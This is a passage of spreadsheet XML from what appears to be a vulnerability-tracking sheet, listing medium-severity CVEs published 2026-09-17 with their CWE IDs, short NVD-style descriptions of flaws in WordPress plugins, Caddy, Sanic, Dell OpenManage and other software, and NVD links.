      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in JetElements For Elementor &lt;= 2.9.2.1 versions.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66579</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66617</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66617</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67071</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>psirt@hcl.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>HCL DevOps Deploy / HCL Launch is susceptible to an information disclosure vulnerability when processing redacted property values. If a deployment is configured with a secure property that starts with certain non-ASCII characters, the redaction engine may fail to mask subsequent ASCII secure values embedded inside insecure properties.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67071</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77281</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-770, CWE-94</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Caddy is an extensible server platform that uses TLS by default. In version 2.11.3 and earlier, three configuration-dependent weaknesses affect the handler and placeholder layer. In modules/caddyhttp/rewrite/rewrite.go, Rewrite.Rewrite() can pass attacker-controlled replacement bytes through buildQueryString for a second placeholder expansion when a rewrite URI ends with a literal question mark, allowing injected environment or request-variable placeholders to disclose data and, when the file provider is registered, allowing injected file placeholders to disclose readable files. The  issue is fixed in version 2.11.4.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77281</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78294</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in  Geo Mashup &lt;= 1.13.21 versions.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78294</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81453</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81453</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81868</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Security.Authorization.Certificate</t>
        </is>
      </c>
      <c r="M272" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-288, CWE-295</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, Steeltoe.Security.Authorization.Certificate deployments using AddOrgAndSpacePolicies() and UseCertificateAuthorization() trust the public certificate supplied in the X-Client-Cert request header without proving possession of the corresponding private key. Common Cloud Foundry routers do not remove this header from inbound requests. When inbound requests are not restricted to a known trusted proxy source IP, an attacker who obtains the public certificate of an application instance in the target organization or space and can reach the application can spoof X-Client-Cert to bypass the SameOrg and SameSpace policies for the certificate validity period. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81868</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85078</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>pip:sanic</t>
        </is>
      </c>
      <c r="M273" s="5" t="inlineStr">
        <is>
          <t>24.12.1, 25.12.1</t>
        </is>
      </c>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. In version 25.12.0, Sanic's core HTTP/1.1 chunked-body handling does not fully consume the trailer-part after the terminating zero chunk before reusing the keep-alive connection buffer. A remote unauthenticated client can place attacker-controlled bytes in that trailer region, causing Sanic to parse and route them as a hidden second request after the outer request. This breaks HTTP request-boundary integrity and can provide a request-smuggling primitive when Sanic is deployed behind intermediaries. This issue is fixed in version 25.12.1.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85078</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90923</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>The Autopay WordPress plugin before 5.0.1 does not enforce the signature on one of its payment callbacks, allowing unauthenticated users to disclose and delete the stored payment parameters of other customers' orders.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90923</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92912</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 uses cryptographically weak uniqid() values for RTMP publish keys in LiveTransmition, reducing key entropy to approximately one million possibilities per creation second. Attackers who know the channel creation time can brute-force the five-digit microsecond component to forge valid stream keys and broadcast content as the channel owner.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92912</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66608</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>Contributor Server Side Request Forgery (SSRF) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.19 versions.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66608</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81443</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81443</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86311</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Shortcode Attributes in all versions up to, and including, 1.8.44 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86311</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86522</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>Improper Output Neutralization for Logs vulnerability in team-alembic AshAuthentication allows an unauthenticated attacker to forge application log entries by submitting a password reset identity containing newlines or control characters.
AshAuthentication.Strategy.Password.RequestPasswordReset.run/3 interpolates the identity argument, the email or username taken straight from the reset request, into its Logger.warning/1 heredocs without escaping, truncating or type-restricting it. The resource logged beside it is passed through inspect/1, which would have neutralized the value. A newline in the identity therefore ends the log record, and everything after it is written as a line of its own, so an attacker chooses the severity tag and the content of entries that appear to have come from the application.
This issue affects ash_authentication: from 4.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86522</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92880</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in vgmstream up to r2117. Impacted is the function vadpcm_read_coefs_be of the file src/coding/vadpcm_decoder.c of the component EA SCHl parser. This manipulation of the argument entry/entries causes out-of-bounds write. Remote exploitation of the attack is possible. Patch name: ae37662ad626254ddd96ad69ac263792d7a92024. It is suggested to install a patch to address this issue.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92880</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92993</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Dromara mayfly-go up to 1.11.5. The impacted element is the function RunMachineScript of the file server/internal/machine/api/machine_script.go of the component Machine Script Feature. The manipulation of the argument params results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. Exploitation needs no admin account. Any account holding machine:script:run plus tag access reaches arbitrary command execution on machines whose templates contain {{.param}} placeholders; the SSH exec layer (Cli.Run) also applies no input filtering to any caller. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92993</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93394</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
